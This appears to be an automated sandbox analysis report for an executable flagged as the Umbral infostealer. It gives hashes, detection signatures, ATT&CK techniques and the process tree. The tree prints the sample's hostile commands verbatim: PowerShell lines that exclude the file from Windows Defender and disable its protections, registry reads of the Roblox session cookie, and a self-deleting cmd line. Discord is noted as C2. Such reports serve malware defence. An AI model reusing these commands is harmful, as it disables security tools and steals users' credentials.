Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
28-08-2024 01:44
Behavioral task
behavioral1
Sample
5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe
Resource
win7-20240704-en
General
-
Target
5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe
-
Size
229KB
-
MD5
eabe2a81aa3dabab25e49ee4b36ce075
-
SHA1
f55b6298f0a8330d90d39e20a73adb2e828dfd1c
-
SHA256
5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
-
SHA512
9688119150d3a466d9a12bfc55933d367104747a2cf319467a78dfcf975361c9e2727f76efe380db9d0c92c39dc4b0241bfb444e965e92720c9edcf42c1d18fe
-
SSDEEP
6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2368-1-0x0000000001010000-0x0000000001050000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2840 powershell.exe 2384 powershell.exe 2564 powershell.exe 1048 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe -
Deletes itself 1 IoCs
pid Process 2160 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2160 cmd.exe 1260 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2868 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1260 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 2840 powershell.exe 2384 powershell.exe 2564 powershell.exe 612 powershell.exe 1048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe Token: SeIncreaseQuotaPrivilege 2856 wmic.exe Token: SeSecurityPrivilege 2856 wmic.exe Token: SeTakeOwnershipPrivilege 2856 wmic.exe Token: SeLoadDriverPrivilege 2856 wmic.exe Token: SeSystemProfilePrivilege 2856 wmic.exe Token: SeSystemtimePrivilege 2856 wmic.exe Token: SeProfSingleProcessPrivilege 2856 wmic.exe Token: SeIncBasePriorityPrivilege 2856 wmic.exe Token: SeCreatePagefilePrivilege 2856 wmic.exe Token: SeBackupPrivilege 2856 wmic.exe Token: SeRestorePrivilege 2856 wmic.exe Token: SeShutdownPrivilege 2856 wmic.exe Token: SeDebugPrivilege 2856 wmic.exe Token: SeSystemEnvironmentPrivilege 2856 wmic.exe Token: SeRemoteShutdownPrivilege 2856 wmic.exe Token: SeUndockPrivilege 2856 wmic.exe Token: SeManageVolumePrivilege 2856 wmic.exe Token: 33 2856 wmic.exe Token: 34 2856 wmic.exe Token: 35 2856 wmic.exe Token: SeIncreaseQuotaPrivilege 2856 wmic.exe Token: SeSecurityPrivilege 2856 wmic.exe Token: SeTakeOwnershipPrivilege 2856 wmic.exe Token: SeLoadDriverPrivilege 2856 wmic.exe Token: SeSystemProfilePrivilege 2856 wmic.exe Token: SeSystemtimePrivilege 2856 wmic.exe Token: SeProfSingleProcessPrivilege 2856 wmic.exe Token: SeIncBasePriorityPrivilege 2856 wmic.exe Token: SeCreatePagefilePrivilege 2856 wmic.exe Token: SeBackupPrivilege 2856 wmic.exe Token: SeRestorePrivilege 2856 wmic.exe Token: SeShutdownPrivilege 2856 wmic.exe Token: SeDebugPrivilege 2856 wmic.exe Token: SeSystemEnvironmentPrivilege 2856 wmic.exe Token: SeRemoteShutdownPrivilege 2856 wmic.exe Token: SeUndockPrivilege 2856 wmic.exe Token: SeManageVolumePrivilege 2856 wmic.exe Token: 33 2856 wmic.exe Token: 34 2856 wmic.exe Token: 35 2856 wmic.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 612 powershell.exe Token: SeIncreaseQuotaPrivilege 1904 wmic.exe Token: SeSecurityPrivilege 1904 wmic.exe Token: SeTakeOwnershipPrivilege 1904 wmic.exe Token: SeLoadDriverPrivilege 1904 wmic.exe Token: SeSystemProfilePrivilege 1904 wmic.exe Token: SeSystemtimePrivilege 1904 wmic.exe Token: SeProfSingleProcessPrivilege 1904 wmic.exe Token: SeIncBasePriorityPrivilege 1904 wmic.exe Token: SeCreatePagefilePrivilege 1904 wmic.exe Token: SeBackupPrivilege 1904 wmic.exe Token: SeRestorePrivilege 1904 wmic.exe Token: SeShutdownPrivilege 1904 wmic.exe Token: SeDebugPrivilege 1904 wmic.exe Token: SeSystemEnvironmentPrivilege 1904 wmic.exe Token: SeRemoteShutdownPrivilege 1904 wmic.exe Token: SeUndockPrivilege 1904 wmic.exe Token: SeManageVolumePrivilege 1904 wmic.exe Token: 33 1904 wmic.exe Token: 34 1904 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2368 wrote to memory of 2856 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 31 PID 2368 wrote to memory of 2856 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 31 PID 2368 wrote to memory of 2856 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 31 PID 2368 wrote to memory of 2796 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 34 PID 2368 wrote to memory of 2796 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 34 PID 2368 wrote to memory of 2796 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 34 PID 2368 wrote to memory of 2840 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 36 PID 2368 wrote to memory of 2840 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 36 PID 2368 wrote to memory of 2840 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 36 PID 2368 wrote to memory of 2384 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 38 PID 2368 wrote to memory of 2384 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 38 PID 2368 wrote to memory of 2384 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 38 PID 2368 wrote to memory of 2564 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 40 PID 2368 wrote to memory of 2564 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 40 PID 2368 wrote to memory of 2564 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 40 PID 2368 wrote to memory of 612 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 42 PID 2368 wrote to memory of 612 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 42 PID 2368 wrote to memory of 612 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 42 PID 2368 wrote to memory of 1904 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 44 PID 2368 wrote to memory of 1904 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 44 PID 2368 wrote to memory of 1904 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 44 PID 2368 wrote to memory of 2456 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 46 PID 2368 wrote to memory of 2456 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 46 PID 2368 wrote to memory of 2456 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 46 PID 2368 wrote to memory of 1500 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 48 PID 2368 wrote to memory of 1500 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 48 PID 2368 wrote to memory of 1500 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 48 PID 2368 wrote to memory of 1048 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 50 PID 2368 wrote to memory of 1048 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 50 PID 2368 wrote to memory of 1048 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 50 PID 2368 wrote to memory of 2868 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 52 PID 2368 wrote to memory of 2868 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 52 PID 2368 wrote to memory of 2868 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 52 PID 2368 wrote to memory of 2160 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 54 PID 2368 wrote to memory of 2160 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 54 PID 2368 wrote to memory of 2160 2368 5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe 54 PID 2160 wrote to memory of 1260 2160 cmd.exe 56 PID 2160 wrote to memory of 1260 2160 cmd.exe 56 PID 2160 wrote to memory of 1260 2160 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2796 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe"C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe"2⤵
- Views/modifies file attributes
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2456
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1048
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2868
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1260
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b67b0c57c60435ded8c18944d6080ad
SHA1b943817ff54a104eb6cf794c641aa58ef10c206e
SHA256c084e9fb50de00907ca32fb31a8099a9a0ca5b6c49ecb5a24cb4af595ac6fd92
SHA5123cb8963ddccaf06d8dfd602a4942b2705161604a2a86b8d3fe80f6cd1152eaa840a44a12724259f224639ec7016081667b6ce2efd60e359d8b235477168164de